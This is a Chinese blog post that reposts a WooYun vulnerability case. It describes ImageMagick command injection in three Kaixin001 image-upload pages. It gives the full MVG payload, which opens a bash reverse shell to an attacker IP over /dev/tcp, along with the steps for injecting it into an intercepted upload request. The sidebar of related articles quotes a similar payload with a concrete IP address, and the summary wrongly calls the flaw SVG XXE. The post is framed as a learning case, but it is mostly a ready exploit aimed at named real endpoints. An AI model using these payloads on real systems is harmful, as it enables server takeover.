【漏洞学习——命令执行】开心网多处命令执行

最新推荐文章于 2025-02-21 10:51:39 发布

原创最新推荐文章于 2025-02-21 10:51:39 发布 · 547 阅读

0 ·

CC 4.0 BY-SA版权

【渗透测试实战】同时被 2 个专栏收录

160 篇文章

订阅专栏

乌云漏洞案例学习

75 篇文章

订阅专栏

本文详细分析了开心网logo.php、upload.php和perfect.php等文件中存在的SVG XXE漏洞，通过特定payload可在上传图片时反弹Shell，实现远程代码执行。文章提供了具体的漏洞利用方法及payload示例。

漏洞细节

漏洞URL1:http://www.kaixin001.com/set/logo.php

在修改头像处，上传正常图片的时候抓包，把下面这个payload直接添加上去就可以直接反弹shell

push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1"
pop graphic-context

漏洞URL2:http://www.kaixin001.com/photo/upload.php
漏洞URL3:http://www.kaixin001.com/lifetime/perfect.php

上传图片处

用以下payload

push graphic-context
viewbox 0 0 640 480
image copy 200,200 100,100 "|bash -i >& /dev/tcp/【ip】/2333 0>&1"
pop graphic-context

上传一个正常的照片，然后抓包添加payload，上传之后可反弹shell

参见：https://bugs.shuimugan.com/bug/view?bug_no=214606

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

FLy_鹏程万里

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
打赏
打赏
打赏举报

举报

专栏目录

[漏洞挖掘与防护] 03.漏洞利用之WinRAR安全缺陷复现（CVE-2018-20250）及软件自启动分析

杨秀璋的专栏

08-26

895

上一篇文章将详细介绍MS08-067远程代码执行漏洞（CVE-2008-4250）及防御过程，它是Windows Server服务RPC请求缓冲区溢出漏洞，利用445端口，并通过Metasploit工具获取shell及进行深入的操作。这篇文章将详细讲解WinRAR漏洞（CVE-2018-20250），并复现了该漏洞和讲解了恶意软件自启动劫持原理。基础性文章，希望对入门的同学有帮助。

[漏洞挖掘与防护] 04.Windows系统安全缺陷之5次Shift漏洞启动计算机机理分析

杨秀璋的专栏

10-16

1576

上一篇文章详细介绍了WinRAR漏洞（CVE-2018-20250），并复现了该漏洞和讲解了恶意软件自启动劫持原理。这篇文章将分享Windows系统漏洞，通过5次Shift漏洞重改CMD，最终实现修改计算机密码并启动计算机，其思路还是比较有趣的，希望对您有所帮助！基础性文章，希望对入门的同学有帮助。

参与评论您还未登录，请先登录后发表或查看评论

ImageMagick命令注入漏洞(CVE-2016–3714)复现笔记

u011975363的专栏

06-18

3201

学习资料 https://www.cnblogs.com/bmjoker/p/9898590.html https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html 漏洞原理 ImageMagick是一款使用量很广的图片处理程序，很多厂商都调用了这个程序进行图片处理，包括图片的伸缩、切割、水印、格式转换等等。但有研究者发现，当用户传入一个包含『畸形内容』的图片的时候，就有可能触发命令注入漏洞。国外的安全人员为此新建了一个网站：

漏洞挖掘中RCE漏洞常用的Payload总结，从零基础到精通，收藏这篇就够了！

最新发布

喜欢Python编程的程序员柚柚呀

02-21

2407

大家好，我是 Ansar Uddin，我是来自孟加拉国的网络安全研究员。这是我的第二篇 Bug 赏金文章。今天的话题都是关于 Rce 的利用。我在一家Top级的公司找到了一个案例:我检查了include=参数. 它容易受到 rce 的影响但是有一个 waf 阻止了我的请求我将payload转换为 url 编码再进行发包：成功Rce!另存为 test.gif 或 test.jpg===保存 test.gif or test.jpg。

Drupal Core 8 PECL YAML 反序列化任意代码执行漏洞（CVE-2017-6920）

EC_Carrot的博客

05-27

682

漏洞背景 Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal 8.0.0版本至8.3.4之前版本中存在远程代码执行漏洞，该漏洞源于PECL YAML解析器没有安全的处理PHP对象。远程攻击者可利用该漏洞在受影响应用程序上下文中执行任意代码或造成拒绝服务。影响版本 Drupal Drupal 8.0.0 - 8.3.4 漏洞复现我这里用的是vulhub的环境，需要基础配置，我这里也会放出来： #获得一个靶机的shell交互界面，CONTAINER换成自己的

Imagetrick 漏洞的实例

2019想做自己的游戏的人加群95303036

05-06

2030

t1.php <?php ini_set('display_errors',true); error_reporting(E_ALL); $a++; $src_img = new Imagick('bug.png'); $icon = new Imagick(); $icon->setFormat('ico'); $icon->addImage($src_img); $icon->writeIm

CSAPP的Lab学习——AttackLab

qq_43264167的博客

09-03

1040

一个本硕双非的小菜鸡，备战24年秋招。刚刚看完CSAPP，真是一本神书啊！遂尝试将它的Lab实现，并记录期间心酸历程。

[系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御

杨秀璋的专栏

12-28

1万+

系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等，通过在线笔记和实践操作的形式分享与博友们学习，希望能与您一起进步。前文介绍了Windows远程桌面服务漏洞（CVE-2019-0708），该高危漏洞利用方式是通过远程桌面端口3389，RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞（CVE-2008-4250），它是Windows Server服务RPC请求缓冲区溢出漏洞，利用445端口，并通过Metasploit工具获取shell及进行深入的操作。

Metasploit基础和命令的使用

w1304099880的博客

03-19

1471

Metasploit基础Metasploit是什么？渗透测试是干什么的？Metasploit基础命令 Metasploit是什么？ Metasploit是一款开源的安全漏洞检测工具，同时Metasploit是免费的工具，因此安全工作人员常用Metasploit工具来检测系统的安全性。Metasploit Framework (MSF) 在2003年以开放源码方式发布，是可以自由获取的开发框架。它是一个强大的开源平台，供开发，测试和使用恶意代码，这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个

PHP实例开发源码——AKCMS政府网站系统 php版GBK.zip

11-30

PHP实例开发源码——AKCMS政府网站系统 php版GBK.zip

ImageMagick漏洞演示

hello_simon的专栏

05-05

2626

centos安装 wgethttp://downloads.jmagick.org/6.4.0/ImageMagick-6.4.0-0.tar.gz tar zvxf ImageMagick-6.4.0-0.tar.gz cd ImageMagick-6.4.0-0 ./configure --prefix=/usr/locate/ImageMagick-6.4.0 --with

Android动态命令执行漏洞,快手APP存在命令执行漏洞

weixin_29099729的博客

05-26

531

app头像上传处传一张图抓包把图片的内容改为push graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|bash -i >& /dev/tcp/107.151.220.83/12345 0>&1")'pop graphic-contextcode 区域POST /rest...

ImageMagick远程代码执行漏洞分析

fly小灰灰的专栏

08-12

7998

1. 漏洞描述漏洞编号： CVE-2016-3714 发现人员： Slack安全工程师Ryan Hube 漏洞简述：产生原因是因为字符过滤不严谨所导致的执行代码. 对于文件名传递给后端的命令过滤不足,导致允许多种文件格式转换过程中远程执行代码。影响版本： ImageMagick6.5.7-8 2012-08-17 ImageMagick6.7.7-10 2014-03-06 低版本至6.9

Core Graphic（二）：context详解

程小龙

02-16

2365

上一篇介绍了CG的历史 context是Quartz的核心概念，在用CG进行画图的时候，必须和context打交道，所以必须要知道context是什么，干什么以及为什么要有context。我们使用CG最基本的操作就是创建路径，路径是一个用数学描述的图形形状，路径可以是矩形的，圆形的，牛仔帽形甚至是一个泰姬陵的形状。路径内可以用颜色进行填充，每一个像素点都可以被设置成特定的颜色。路径也可以是一

漏洞复现-Drupal远程代码执行漏洞（CVE-2018-7602）

qq_45751902的博客

10-23

2760

的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介，从而导致该站点受到威胁。此漏洞与 Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。-c 后面接命令，紧随账号，密码。

ImageMagick再爆核心漏洞站长小心

weixin_34268843的博客

09-01

184

目前所有版本的GraphicsMagick和ImageMagick都支持打开文件，当文件名的第一个字符为“|”，则文件名会被传递给shell程序执行，导致（可能远程）代码执行。文件打开操作位于源代码文件blob.c中的OpenBlob()函数，不同于CVE-2016-3714的是，此漏洞存在于软件处理的核心代码中。绿盟科技威胁预警级别高级：影...

命令执行和代码执行漏洞